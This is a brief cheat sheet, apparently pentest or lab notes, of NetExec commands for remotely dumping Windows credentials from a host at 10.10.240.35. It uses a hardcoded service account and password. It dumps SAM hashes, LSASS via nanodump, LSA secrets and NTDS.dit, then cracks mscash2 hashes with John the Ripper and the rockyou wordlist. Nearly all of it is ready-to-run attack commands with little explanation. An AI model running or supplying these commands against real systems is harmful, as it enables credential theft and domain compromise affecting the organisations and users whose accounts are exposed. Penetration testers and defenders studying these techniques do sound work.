NetExec - Remote Hash Dumping
Dump SAM (local admin)
netexec smb 10.10.240.35 -u 'svc_backup' -p 'Autumn2024!' --sam
netexec smb 10.10.240.35 -u 'svc_backup' -p 'Autumn2024!' --sam | fgrep -v '[' | awk -F: '{print $4}' | tee dumped_hashes.txt
Dump LSASS via nanodump (local admin)
netexec smb 10.10.240.35 -u 'svc_backup' -p 'Autumn2024!' -M nanodump
netexec smb 10.10.240.35 -u 'svc_backup' -p 'Autumn2024!' -M nanodump | fgrep -v '[' | awk -F: '{print $2}' | tee -a dumped_hashes.txt
Dump LSA (local admin)
netexec smb 10.10.240.35 -u 'svc_backup' -p 'Autumn2024!' --lsa
netexec smb 10.10.240.35 -u 'svc_backup' -p 'Autumn2024!' --lsa secdump
LSA may yield mscash hashes which need cracking:
john --wordlist=/usr/share/wordlists/rockyou.txt hash --format=mscash2
Dump NTDS.dit (Domain Admin / DC local admin)
netexec smb 10.10.240.35 -u 'svc_backup' -p 'Autumn2024!' -M ntdsutil | fgrep -v '[' | awk -F: '{print $4}' | tee -a dumped_hashes.txt
Clean up collected hashes
awk 'NF {print $1}' dumped_hashes.txt | sort | uniq | tee unique_hashes.txt